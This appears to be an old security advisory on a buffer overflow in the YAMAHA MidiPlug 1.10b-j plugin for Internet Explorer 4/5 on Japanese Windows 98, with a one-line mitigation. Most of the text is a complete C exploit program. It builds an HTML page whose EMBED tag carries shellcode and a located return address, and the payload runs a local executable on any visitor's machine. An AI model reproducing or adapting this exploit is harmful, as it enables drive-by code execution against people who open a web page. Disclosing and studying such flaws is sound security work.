COMMAND

    MidiPlug

SYSTEMS AFFECTED

    YAMAHA MidiPlug 1.10b on IE4/5 Windows98J

PROBLEM

    Midi-Plugin program  "YAMAHA MidiPlug  1.10b-j" for  Windows IE4/5
    contains the buffer overflow bug.  If the long "TEXT" variable  is
    specified in EMBED tag, the  buffer overflow occurs.  If  attacker
    sets the exploit on the webpage, visitor's host will be cracked by
    the any instructions written in the "TEXT" variable.

    Exploit:

        http://shadowpenguin.backsection.net/toolbox.html#no051

    This exploit generates a html file that contains the exploit.  The
    html file  executes "c:\windows\welcome.exe"  on the  victim host.
    This is tested on Windows98(Japanese).

    /*=============================================================================
       YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguin@backsection.net)
      =============================================================================
    */
    
    #include    <stdio.h>
    #include    <windows.h>
    
    #define     MAXBUF          700
    #define     RETADR          256
    
    unsigned int mems[]={
    0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,0,0};
    
    unsigned char exploit_code[200]={
    0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
    0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
    0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
    0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
    0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
    0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
    0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
    0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
    0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
    };
    
    unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";
    
    unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                    unsigned char c1,unsigned char c2)
    {
        unsigned char   *p;
        unsigned int    adr;
    
        for (p=st;p<ed;p++)
            if (*p==c1 && *(p+1)==c2){
                adr=(unsigned int)p;
                if ((adr&0xff)==0) continue;
                if (((adr>>8)&0xff)==0) continue;
                if (((adr>>16)&0xff)==0) continue;
                if (((adr>>24)&0xff)==0) continue;
                return(adr);
            }
        return(0);
    
    }
    main(int argc,char *argv[])
    {
        FILE                    *fp;
        unsigned int            i,ip;
        unsigned char           buf[MAXBUF];
    
        if (argc<2){
            printf("usage %s output_htmlfile\n",argv[0]);
            exit(1);
        }
        if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
        fprintf(fp,"<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"");
        for (i=0;;i+=2){
            if (mems[i]==0){
                printf("Can not find jmp code.\n");
                exit(1);
            }
            if ((ip=search_mem(fp,(unsigned char *)mems[i],
                (unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
        }
        printf("Jumping address : %x\n",ip);
        memset(buf,0x90,MAXBUF);
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
        strcat(exploit_code,cmdbuf);
        memcpy(buf,exploit_code,strlen(exploit_code));
        buf[MAXBUF]=0;
        fprintf(fp,"%s\"\n>\n</HTML>",buf);
        fclose(fp);
        printf("%s created.\n",argv[1]);
        return FALSE;
    }

SOLUTION
    
    If the  check of  "execution of  active X  controle and plugin" is
    turned to "invalid", you can avoid this problem.  "Display  dialog
    box mode"  is also  vulnerable.   The overflow  occurs without the
    dialog box warning,  if the opening  file is stored  in local disk
    and it is opened.